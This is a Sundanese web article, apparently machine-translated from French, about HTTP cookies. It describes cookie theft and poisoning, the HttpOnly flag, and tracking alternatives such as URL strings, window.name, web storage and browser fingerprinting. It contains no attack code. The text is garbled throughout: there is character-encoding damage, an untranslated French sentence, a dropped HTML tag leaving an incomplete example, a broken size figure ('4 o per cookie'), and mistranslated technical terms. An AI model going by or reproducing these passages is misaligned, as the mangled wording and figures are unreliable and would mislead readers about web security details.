Serangan jinis ieu hese dideteksi di sisi pangguna sabab naskah asalna tina domain anu sami anu nyetél cookie, sareng operasi pikeun ngirim nilai sigana diidinan ku domain éta. Hal ieu dianggap yén éta téh tanggung jawab pangurus operasi tipe ieu loka pikeun nempatkeun di tempat larangan nyegah publikasi kode jahat.

Cookies henteu langsung katingali ku program sisi klien sapertos JavaScript upami dikirim nganggo bandéra HttpOnly. Tina sudut pandang pangladén, hiji-hijina bédana nyaéta dina garis lulugu Set-Cookie ditambahan widang anyar anu ngandung string HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Nalika panyungsi nampi cookie sapertos kitu, éta sakuduna dianggo sacara normal dina bursa HTTP di handap ieu, tapi henteu katingali ku naskah anu dieksekusi dina sisi klien. Bandéra HttpOnly sanés bagian tina spésifikasi téknis resmi, sareng henteu dilaksanakeun dina sadaya panyungsi. Catet yén ayeuna teu aya jalan pikeun nyegah maca sareng nyerat cookies sési ku metode XMLHTTPRequest.

Modifikasi eusi: panyerang ngirimkeun cookie anu teu sah ka server, sigana didamel tina cookie anu valid anu dikirim ku server.

Pas cookies kedah disimpen sareng dipulangkeun deui ka server, panyerang tiasa ngarobih nilai cookies sateuacan dikirim deui ka server. Contona, upami cookie ngandung nilai total pamaké kudu mayar barang disimpen dina karanjang balanja toko urang, ngarobah nilai ieu nembongkeun server kana resiko ngecas panyerang kirang ti harga awal. Prosés ngaropéa nilai cookies disebut karacunan cookie tur bisa dipaké sanggeus maling cookie sangkan serangan pengkuh.

Dina metode override cookie, panyerang ngamangpaatkeun gangguan browser pikeun ngirim cookie anu teu valid ka server.

Paling jaba, kumaha oge, ngan nyimpen hiji ID sési - angka unik dihasilkeun acak dipaké pikeun ngaidentipikasi pamaké sési - dina cookie sorangan, bari sagala informasi sejenna disimpen dina server. Dina hal ieu, masalah ieu sakitu legana direngsekeun.

Unggal situs diperkirakeun gaduh cookies sorangan, jadi hiji situs teu kudu bisa ngarobah atawa nyieun cookies pakait sareng situs séjén. Cacat kaamanan browser wéb tiasa ngamungkinkeun situs jahat ngalanggar aturan ieu. Eksploitasi cacad sapertos biasa disebut masak cross-situs. Tujuan tina serangan misalna bisa jadi maling ID sési.

Pamaké kedah nganggo vérsi pangénggalna browser wéb dimana kerentanan ieu ampir ngaleungitkeun.

Kaayaan konflik antara klien sareng server

Pamakéan cookies tiasa ngahasilkeun kontradiksi antara kaayaan klien sareng kaayaan anu disimpen dina cookie. Lamun pamaké acquires cookie sarta clicks on tombol "Balik" browser nu, kaayaan browser umumna teu sarua jeung saméméh akuisisi ieu. Salaku conto, upami karanjang toko online didamel nganggo cookies, eusi karanjang henteu tiasa robih nalika pangguna uih deui ka sajarah browser: upami pangguna mencét tombol pikeun nambihan tulisan dina karinjangna sareng ngaklik "Balik deui. "Tombol, artikel tetep dina hiji ieu. Ieu bisa jadi teu niat pamaké, anu pasti hayang ngabolaykeun tambahan artikel. Ieu bisa ngakibatkeun unreliability, kabingungan, sarta bug. Janten pamekar wéb kedah sadar kana masalah ieu sareng ngalaksanakeun ukuran pikeun nanganan kaayaan sapertos kieu.

Cookies pengkuh geus dikritik ku ahli kaamanan privasi pikeun teu disetel ka kadaluwarsa cukup pas, sahingga sahingga jaba ngalacak pamaké sarta ngawangun profil maranéhanana ngaliwatan waktu. Aspék cookies ieu ogé mangrupikeun bagian tina masalah pangbajak sési, sabab cookie pengkuh anu dipaling tiasa dianggo pikeun nyamar pangguna pikeun sababaraha waktos.

Baca ogé: GAFAM: saha aranjeunna? Naha aranjeunna (kadang-kadang) pikasieuneun?

Alternatif pikeun cookies

Sababaraha operasi anu tiasa dilakukeun nganggo cookies ogé tiasa dilakukeun nganggo mékanisme sanés anu ngalangkungan cookies atanapi nyiptakeun deui cookies anu dihapus, anu nyiptakeun masalah privasi dina cara anu sami (atanapi kadang langkung parah sabab henteu katingali) tibatan cookies.

Alamat IP

Pamaké bisa dilacak ku alamat IP tina komputer nelepon kaca. Téhnik ieu geus sadia saprak bubuka World Wide Web, salaku kaca nu diundeur server requests alamat IP tina komputer ngajalankeun browser atawa proxy, lamun euweuh dipaké. Pangladén tiasa ngalacak inpormasi ieu naha aya cookies anu dianggo atanapi henteu. Tapi, alamat-alamat ieu biasana kurang dipercaya dina ngaidentipikasi pangguna tibatan cookies sabab komputer sareng proxy tiasa dibagi ku sababaraha pangguna, sareng komputer anu sami tiasa nampi alamat IP anu béda dina unggal sési padamelan (sapertos c sering kasus pikeun sambungan telepon). .

Nyukcruk ku alamat IP tiasa dipercaya dina sababaraha kaayaan, sapertos sambungan broadband anu ngajaga alamat IP anu sami kanggo waktos anu lami, salami kakuatan hurung.

Sababaraha sistem sapertos Tor dirancang pikeun ngajaga anonimitas Internét sareng ngajantenkeun nyukcruk ku alamat IP teu mungkin atanapi teu praktis.

URL

Téhnik anu langkung tepat dumasar kana émbaran nampilkeun dina URL. Bagian string query tina URL mangrupa salah sahiji téhnik nu ilaharna dipaké pikeun tujuan ieu, tapi bagian séjén bisa dipaké ogé. Boh serverlet Java sareng mékanisme sési PHP nganggo metode ieu upami cookies henteu diaktipkeun.

Metoda ieu ngalibatkeun pangladén wéb nambihkeun pamundut string ka tautan halaman wéb anu mawa éta nalika dikirim ka browser. Lamun pamaké nuturkeun tumbu, browser nu mulih string query napel server.

string query dipaké pikeun tujuan ieu sarta cookies pisan sarupa, duanana keur informasi wenang dipilih ku server jeung balik ku browser nu. Sanajan kitu, aya sababaraha béda: lamun URL ngandung string query dipaké deui, informasi sarua dikirim ka server. Contona, upami karesep pangguna disandikeun dina string pamundut URL sareng pangguna ngirimkeun URL éta ka pangguna sanés ngalangkungan email, éta pangguna ogé tiasa nganggo préferénsi éta.

Di sisi anu sanés, nalika pangguna ngaksés halaman anu sami dua kali, teu aya jaminan yén string pamundut anu sami bakal dianggo dua kali. Salaku conto, upami pangguna darat dina halaman tina halaman situs internal pertama kali sareng darat dina halaman anu sami ti halaman éksternal kadua kalina, string query relatif ka halaman situs biasana béda, sedengkeun cookies sami. .

Kalemahan séjén tina string query aya hubunganana sareng kaamanan: ngajaga data anu ngidentipikasi sési dina string query ngamungkinkeun atanapi nyederhanakeun serangan fiksasi sési, serangan rujukan identifier, sareng garapan sanésna. Ngaliwatan ID sési salaku cookies HTTP leuwih aman.

Widang bentuk disumputkeun

Hiji wangun tracking sési, dipaké ku ASP.NET, nyaéta ngagunakeun formulir web kalawan widang disumputkeun. Téhnik ieu mirip pisan sareng nganggo senar query URL pikeun mawa inpormasi sareng gaduh kaunggulan sareng kalemahan anu sami; sareng upami formulirna diolah nganggo metode HTTP GET, lapangan saleresna janten bagian tina URL browser anu bakal dikirim nalika ngirimkeun formulir. Tapi lolobana formulir diolah ku HTTP POST, nu ngabalukarkeun informasi formulir, kaasup widang disumputkeun, ditambahkeun salaku input tambahan nu sanes bagian tina URL na cookie a.

pendekatan ieu boga dua kaunggulan ti sudut pandang tracking: kahiji, nyukcruk informasi disimpen dina kode sumber HTML jeung input POST tinimbang URL bakal ngidinan pamaké rata ulah tracking ieu; kadua, informasi sési teu disalin nalika pamaké nyalin URL (pikeun nyimpen kaca ka disk atawa ngirim eta via email, contona).

jandela.ngaran

Sadaya panyungsi wéb umum tiasa nyimpen data anu lumayan ageung (2MB dugi ka 32MB) ngalangkungan JavaScript nganggo properti window.name DOM. Data ieu tiasa dianggo gaganti cookies sési sareng ogé dianggo dina domain. Téhnik tiasa gandeng sareng objék JSON pikeun nyimpen set kompleks variabel sési sisi klien.

The downside nyaeta unggal jandela misah atawa tab mimitina bakal kosong window.name; nalika browsing ku tab (dibuka ku pamaké) ieu ngandung harti yén tab dibuka individual moal boga ngaran jandela. Salaku tambahan window.name tiasa dianggo pikeun ngalacak sémah dina sababaraha situs anu tiasa nyababkeun masalah privasi.

Dina sababaraha hal ieu bisa jadi leuwih aman ti cookies, alatan non-involvement tina server, sahingga invulnerable kana serangan jaringan cookies sniffer. Nanging, upami ukuran khusus dilaksanakeun pikeun ngajagi data, éta rentan ka serangan salajengna, sabab datana sayogi ngalangkungan situs sanés anu dibuka dina jandela anu sami.

auténtikasi HTTP

Protokol HTTP kalebet protokol auténtikasi aksés dasar sareng pencernaan auténtikasi aksés, anu ngamungkinkeun aksés ka halaman wéb ngan ukur nalika pangguna masihan nami pangguna sareng kecap konci. Upami pangladén menta sertipikat pikeun masihan aksés ka halaman wéb, browser naroskeun éta ti pangguna sareng saatos nampi, browser nyimpen éta sareng ngirimkeunana dina sadaya pamundut HTTP salajengna. Inpormasi ieu tiasa dianggo pikeun ngalacak pangguna.

objék dibagikeun lokal

Upami browser kalebet plugin Adobe Flash Player, √©ta obj√©k dibagikeun lokal tiasa dianggo pikeun tujuan anu sami sareng cookies. √Čta tiasa janten pilihan anu pikaresepeun pikeun pamekar w√©b kusabab:

  • wates ukuran standar pikeun obj√©k dibagikeun lokal nya√©ta 100 KB;
  • c√©k kaamanan misah ti c√©k cookie pamak√© (jadi obj√©k dibagikeun lokal bisa diwenangkeun lamun cookies henteu).

Poin anu terakhir ieu, anu ngabédakeun kabijakan ngokolakeun cookie sareng objék anu dibagikeun lokal Adobe raises patarosan ngeunaan manajemén ku pamaké setélan privasi na: anjeunna kudu sadar yen manajemén cookies na teu boga dampak dina manajemen objék dibagikeun lokal, sarta sabalikna.

Kritik séjén pikeun sistem ieu nyaéta ngan ukur tiasa dianggo ngalangkungan plugin Adobe Flash Player anu proprietary sareng sanés standar wéb.

Kegigihan sisi klien

Sababaraha panyungsi wéb ngadukung mékanisme kegigihan dumasar-skrip, anu ngamungkinkeun halaman pikeun nyimpen inpormasi sacara lokal pikeun dianggo engké. Internet Explorer, contona, ngadukung inpormasi anu tetep dina sajarah browser, téténggér, dina format anu disimpen dina XML, atanapi langsung sareng halaman wéb anu disimpen kana disk. Pikeun Microsoft Internet Explorer 5, aya metode data-pamaké anu sayogi ngalangkungan paripolah DHTML.

W3C diwanohkeun dina HTML 5 API JavaScript anyar pikeun neundeun data sisi klien disebut gudang Web tur aimed pikeun perman√©n ngaganti cookies. √Čta sami sareng cookies tapi kalayan kapasitas anu ningkat pisan sareng tanpa nyimpen inpormasi dina lulugu pamundut HTTP. API ngamungkinkeun dua jinis panyimpen w√©b: panyimpen lokal sareng panyimpanan sesi, sami sareng cookie pengkuh sareng cookies s√©si (iwal y√©n cookies s√©si kadaluwarsa nalika browser ditutup nalika neundeun s√©si kadaluarsa nalika tab ditutup), masing-masing. Panyimpen w√©b dirojong ku Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 sareng Opera 10.50.

M√©kanisme anu b√©da biasana ngandelkeun cache browser (dina m√©mori tinimbang refresh) nganggo program JavaScript dina halaman w√©b. 

Contona, hiji kaca bisa ngandung tag . La premi√®re fois que la page se charge, le programme exemple.js est aussi charg√©. 

Dina titik ieu, program tetep aya dina m√©mori cache sareng halaman anu dilongok henteu dimuat deui pikeun kadua kalina. Akibatna, lamun program ngandung variabel global (contona var id = 3243242;), identifier ieu tetep valid tur bisa dieksploitasi ku kode JavaScript s√©j√©n sakali kaca dimuat deui, atawa sakali kaca linking program dimuat. 

Kelemahan utama metode ieu nyaéta variabel global JavaScript kedah statis, hartosna éta henteu tiasa dirobih atanapi dihapus sapertos cookie.

web browser sidik

Sidik browser nyaéta inpormasi anu dikumpulkeun ngeunaan setélan konfigurasi browser pikeun tujuan idéntifikasi. Sidik ieu tiasa dianggo pikeun ngaidentipikasi sapinuhna atanapi sawaréh pangguna Internét atanapi alat sanajan cookies ditumpurkeun.

Inpormasi konfigurasi browser wéb dasar parantos lami dikumpulkeun ku jasa pamiarsa halaman wéb pikeun tujuan ngukur lalu lintas wéb manusa sacara akurat sareng ngadeteksi sagala rupa bentuk panipuan klik. Kalayan bantosan basa skrip sisi klien, pangumpulan inpormasi langkung akurat ayeuna mungkin.

Ngarobah inpo ieu kana bit string ngahasilkeun sidik alat. Dina 2010, Electronic Frontier Foundation (EFF) ngukur éntropi sidik ramo browser sahenteuna sahenteuna. 18,1 bit, sareng éta sateuacan kamajuan dina sidik jari kanvas nambihan 5,7 bit kana éntropi éta.

Cookies dina nutshell

Cookies mangrupikeun file téks leutik anu disimpen ku browser wéb dina hard drive pangunjung halaman wéb sareng anu dianggo (antara anu sanés) pikeun ngarékam inpormasi ngeunaan sémah atanapi perjalananna ngalangkungan situs éta. webmaster sahingga bisa mikawanoh kabiasaan nganjang sarta pribados presentasi situs-Na pikeun tiap nganjang; cookies teras ngamungkinkeun pikeun nginget sabaraha tulisan anu dipidangkeun dina halaman bumi atanapi bahkan pikeun nahan kredensial login pikeun pihak swasta mana waé: nalika nganjang deui ka situs éta, anjeunna henteu kedah ngetik deui nami sareng kecap konci na. dipikawanoh, sabab otomatis dibaca dina cookie.

A cookie boga umur kawates, diatur ku desainer situs. √Čta og√© bisa kadaluwarsa di ahir s√©si dina loka, nu pakait jeung nutup browser nu. Cookies seueur dianggo pikeun ngagampangkeun kahirupan pikeun s√©mah sareng nampilkeun inpormasi anu langkung relevan. Tapi t√©knik husus ngamungkinkeun pikeun nuturkeun nganjang dina sababaraha situs sahingga pikeun ngumpulkeun sarta cross-pariksa informasi pisan √©kst√©nsif ngeunaan kabiasaan-Na. Metoda ieu parantos masihan reputasi cookies salaku t√©knik panjagaan anu ngalanggar privasi s√©mah, anu hanjakalna saluyu sareng kanyataan dina seueur kasus panggunaan alesan non-teknis atanapi henteu hormat kana ekspektasi pangguna. .

Pikeun ngaréspon kana kasieun anu sah ieu, HTML 5 ngenalkeun API JavaScript énggal pikeun panyimpen data sisi klien anu disebut panyimpenan wéb, anu langkung aman sareng kapasitas anu langkung ageung, anu tujuanana pikeun ngagentos cookies.

Panyimpenan cookies

Kalayan sababaraha panyungsi, cookie gampang diédit, pangropéa téksu saderhana sapertos Notepad cekap pikeun ngarobih nilaina sacara manual.

Cookies disimpen béda-béda gumantung kana browser:

  • Microsoft Internet Explorer nyimpen unggal cookie dina file b√©da;
  • Mozilla Firefox nyimpen sadaya cookies na dina file tunggal;
  • opera nyimpen sadaya cookies na dina file tunggal jeung encrypts aranjeunna (teu mungkin pikeun ngarop√©a aranjeunna iwal dina pilihan software);
  • Apple Safari nyimpen sadaya cookies na dina file extension .plist tunggal. Modifikasi mungkin tapi teu pisan gampang, iwal mun ngaliwatan pilihan software.

Browser diperlukeun pikeun ngarojong minimum a :

  • 300 cookies sakaligus;
  • 4 o per cookie;
  • 20 cookies per host atanapi domain.
[Jumlah: 0 hartosna: 0]

Ditulis ku Ulasan √Čditor

Tim éditor ahli nyéépkeun waktos pikeun nalungtik produk, ngalaksanakeun tés praktis, ngawawancara ahli industri, marios ulasan konsumen, sareng nyerat sadaya hasil salaku kasimpulan anu kahartos sareng komprehensif.

Ninggalkeun comment hiji

Alamat email anjeun moal diterbitkeun. widang dibutuhkeun nu ditandaan *

Naon anu anjeun pikirkeun?

384 nunjuk
Upvote Downvote